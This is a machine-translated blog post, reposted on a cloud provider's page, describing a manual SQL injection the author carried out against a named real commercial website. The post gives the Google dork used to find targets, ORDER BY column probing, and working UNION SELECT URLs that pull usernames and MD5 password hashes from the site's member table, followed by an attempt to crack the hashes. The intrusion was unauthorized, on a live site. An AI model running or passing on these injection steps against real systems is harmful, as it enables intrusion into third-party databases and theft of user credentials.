Home > Developer > MySQL

One time PHP manual injection (MySQL)

Source: Internet
Author: User
Developer on Alibaba Coud: Build your first app with APIs, SDKs, and tutorials on the Alibaba Cloud. Read more >

Light said do not practice false bashi, about the script intrusion look at the heart itch, practice a.


First Google:inurl: "Php?id="

Find this site to get injected:

Http://brand.66wz.com/store.php?id=18


Tried the next http://brand.66wz.com/store.php?id=18 and user>0 .

There is a response, the error message appears on the webpage:

650) this.width=650; "src=" http://s3.51cto.com/wyfs02/M02/52/77/wKiom1RkdxLDtG2sAAQ2-6in8ns361.jpg "title=" 1.png " Style= "Float:none;" alt= "wkiom1rkdxldtg2saaq2-6in8ns361.jpg"/>


And then enter

http://brand.66wz.com/store.php?id=18 and order by 5

Error:

650) this.width=650; "src=" http://s3.51cto.com/wyfs02/M00/52/76/wKioL1Rkd4OR_xkuAASLlyo7E7A799.jpg "title=" 2.png " Style= "Float:none;" alt= "wkiol1rkd4or_xkuaasllyo7e7a799.jpg"/>


As prompted, instead:

Http://brand.66wz.com/store.php?id=18 ORDER by 5 DESC LIMIT 0,20

Page OK:

650) this.width=650; "src=" http://s3.51cto.com/wyfs02/M01/52/76/wKioL1Rkd5Xz8M1oAARIIZNyYAE492.jpg "title=" 5.png " Style= "Float:none;" alt= "wkiol1rkd5xz8m1oaariiznyyae492.jpg"/>


Then change 5 to 30, error.

Change to 20, normal.

······

Finally, the critical value is .

650) this.width=650; "src=" http://s3.51cto.com/wyfs02/M02/52/76/wKioL1Rkd4WjcMsJAARGaaDZeKY972.jpg "title=" 3.png " Style= "Float:none;" alt= "wkiol1rkd4wjcmsjaargaadzeky972.jpg"/>

650) this.width=650; "src=" http://s3.51cto.com/wyfs02/M02/52/76/wKioL1Rkd4zjzYZdAAQ-mEdwV5Q846.jpg "title=" 4.png " Style= "Float:none;" alt= "wkiol1rkd4zjzyzdaaq-medwv5q846.jpg"/>



Then get the following URL via Firefox plugin:

Http://brand.66wz.com/store.php?id=18 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 From tables



Behind the tables I tried a lot of words, such as admin or something, can not.

Ben came here and it was time to end.

Later it felt too pity, holding a try the mentality from the source of the Web page to take a dot keyword Baidu, found a lot of information related to this site: (http://zhangjianbin.iteye.com/blog/1631387)

Among them are:

Brand_admincp_group Management Group

Brand_admincp_member Administrator

Brand_admincp_perm Administrator Privileges

Brand_adminsession Administrator and store admin login count and information judgment

Brand_members member Information


Finally even the source code has:http://code1.okbase.net/codefile/tool.func.php_2012121116304_79.htm


Then enter:

Http://brand.66wz.com/store.php?id=18 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 From Brand_members

650) this.width=650; "src=" http://s3.51cto.com/wyfs02/M00/52/78/wKiom1Rkdzeid5ynAASfqvZnjvo507.jpg "title=" 6.png " Style= "Float:none;" alt= "wkiom1rkdzeid5ynaasfqvznjvo507.jpg"/>


Ok! You can insert a field.


The user name and MD5 encrypted password are obtained by inserting username and password respectively:

650) this.width=650; "src=" http://s3.51cto.com/wyfs02/M01/52/78/wKiom1RkdzvB9Dm-AASaCFPSP6c089.jpg "title=" 7.png " Style= "Float:none;" alt= "wkiom1rkdzvb9dm-aasacfpsp6c089.jpg"/>

650) this.width=650; "src=" http://s3.51cto.com/wyfs02/M01/52/76/wKioL1RkeQCRMDbnAAVEEHz5zSk687.jpg "title=" 8.png " alt= "Wkiol1rkeqcrmdbnaaveehz5zsk687.jpg"/>


So how to match username and Passeord , when using the pangolin scan found there is a uid field:

650) this.width=650; "src=" http://s3.51cto.com/wyfs02/M01/52/7A/wKiom1RkemyzteznAAR9YZEG40g648.jpg "style=" float: none; "title=" 9.png "alt=" Wkiom1rkemyzteznaar9yzeg40g648.jpg "/>



So just add "where Uid=xxxxx" to the URL.

For example:

Http://brand.66wz.com/store.php?id=18 UNION SELECT 1,2,3,4,5,6,7,8,9,username, 11,12,13,14,15,16,17,18,19,20,21,22,23,24 from Brand_members where uid=555157

650) this.width=650; "src=" http://s3.51cto.com/wyfs02/M01/52/7A/wKiom1Rkeu-jQ5OGAASxpWictcM308.jpg "title=" 10.png "alt=" Wkiom1rkeu-jq5ogaasxpwictcm308.jpg "/>

Http://brand.66wz.com/store.php?id=18 UNION SELECT 1,2,3,4,5,6,7,8,9,password, 11,12,13,14,15,16,17,18,19,20,21,22,23,24 from Brand_members where uid=555157

650) this.width=650; "src=" http://s3.51cto.com/wyfs02/M02/52/78/wKioL1Rke4-iJrzWAAS8gdT_Pt4382.jpg "title=" 11.png "alt=" Wkiol1rke4-ijrzwaas8gdt_pt4382.jpg "/>


Later, MD5 decryption of the time found ...

There are already holes in this website on the dark clouds:

http://www.wooyun.org/bugs/wooyun-2010-046524


It's been quite a long time.

This article is from the "7558298" blog, please be sure to keep this source http://7568298.blog.51cto.com/7558298/1576177

One time PHP manual injection (MySQL)

This article is an English version of an article which is originally in the Chinese language on aliyun.com and is provided for information purposes only. This website makes no representation or warranty of any kind, either expressed or implied, as to the accuracy, completeness ownership or reliability of the article or any translations thereof. If you have any concerns or complaints relating to the article, please send an email, providing a detailed description of the concern or complaint, to info-contact@alibabacloud.com. A staff member will contact you within 5 working days. Once verified, infringing content will be removed immediately.

Related Keywords:
php mysql injection php mysql sql injection php prevent mysql injection php mysql injection protection php mysql missing manual php mysql manual php mysql prevent sql injection
Related Article
MySQL batch update and batch update different values for mult...
The solution of no package Mysql-server available error when ...
The efficiency of MySQL nested query and connection query
The differences between int, bigint, smallint, and tinyint in...
MySQL row-level lock, table-level lock, page-level lock Detai...
MySQL Case statement (with instance)

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

What's Trending
Top 10 Tags
datastax versions naming convention zookeeper client class definition md5 microsoft sql server 2005 data structures exception handling error handling
Top 10 Keywords
microsoft download center down wordpress address url site address url wordpress address url windows installer 4 0 download 302 not found web address url definition site address url wordpress db2 integer mac os installation step by step pdf abbreviation for return

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

Get Started for Free

  • Sales Support

    1 on 1 presale consultation

    Chat Contact Sales

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

    Open a Ticket

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.

    Learn More